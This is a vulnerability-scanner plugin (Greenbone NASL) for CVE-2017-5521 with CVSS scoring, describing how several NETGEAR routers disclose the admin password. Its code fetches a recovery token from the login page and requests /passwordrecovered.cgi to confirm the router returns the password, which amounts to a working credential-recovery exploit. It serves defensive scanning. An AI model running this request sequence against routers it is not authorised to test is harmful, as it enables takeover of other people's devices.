CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
99.9%
Multiple NETGEAR devices are prone to an admin password disclosure
vulnerability
# SPDX-FileCopyrightText: 2017 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.106536");
script_version("2024-07-01T05:05:39+0000");
script_tag(name:"last_modification", value:"2024-07-01 05:05:39 +0000 (Mon, 01 Jul 2024)");
script_tag(name:"creation_date", value:"2017-01-23 12:10:26 +0700 (Mon, 23 Jan 2017)");
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:N/A:N");
script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2024-06-28 14:02:32 +0000 (Fri, 28 Jun 2024)");
script_xref(name:"CISA", value:"Known Exploited Vulnerability (KEV) catalog");
script_xref(name:"URL", value:"https://www.cisa.gov/known-exploited-vulnerabilities-catalog");
script_cve_id("CVE-2017-5521");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"Mitigation");
script_name("NETGEAR Devices Password Disclosure Vulnerability");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2017 Greenbone AG");
script_family("Web application abuses");
script_dependencies("find_service.nasl", "httpver.nasl", "global_settings.nasl");
script_require_ports("Services/www", 8443);
script_exclude_keys("Settings/disable_cgi_scanning");
script_tag(name:"summary", value:"Multiple NETGEAR devices are prone to an admin password disclosure
vulnerability");
script_tag(name:"vuldetect", value:"Tries to recover the admin password.");
script_tag(name:"insight", value:"An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300,
R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password
disclosure via simple crafted requests to the web management server. The bug is exploitable remotely if the
remote management option is set, and can also be exploited given access to the router over LAN or WLAN. When
trying to access the web panel, a user is asked to authenticate. If the authentication is canceled and password
recovery is not enabled, the user is redirected to a page that exposes a password recovery token. If a user
supplies the correct token to the page /passwordrecovered.cgi?id=TOKEN (and password recovery is not enabled),
they will receive the admin password for the router.
If password recovery is set the exploit will fail, as it will ask the user for the recovery questions that were
previously set when enabling that feature. This is persistent (even after disabling the recovery option, the
exploit will fail) because the router will ask for the security questions.");
script_tag(name:"affected", value:"NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3,
WNR3500Lv2, R6250, R6700, R6900 and R8000 devices");
script_tag(name:"solution", value:"As a mitigation manually enable the password recovery feature on your
device and ensure that remote management is disabled.");
script_xref(name:"URL", value:"http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
port = http_get_port(default: 8443);
res = http_get_cache(port: port, item: "/");
if ('Basic realm="NETGEAR' >!< res)
exit(0);
token = eregmatch(pattern: "unauth.cgi\?id=([0-9]+)", string: res);
if (isnull(token[1]))
exit(0);
token = token[1];
if (http_vuln_check(port: port, url: "/passwordrecovered.cgi?id=" + token,
pattern: "You can now log into the router using username .* and this recovered password",
extra_check: "Router Admin Password")) {
report = http_report_vuln_url(port: port, url: "/passwordrecovered.cgi?id=" + token);
security_message(port: port, data: report);
exit(0);
}
exit(0);
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:N/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
High
EPSS
Percentile
99.9%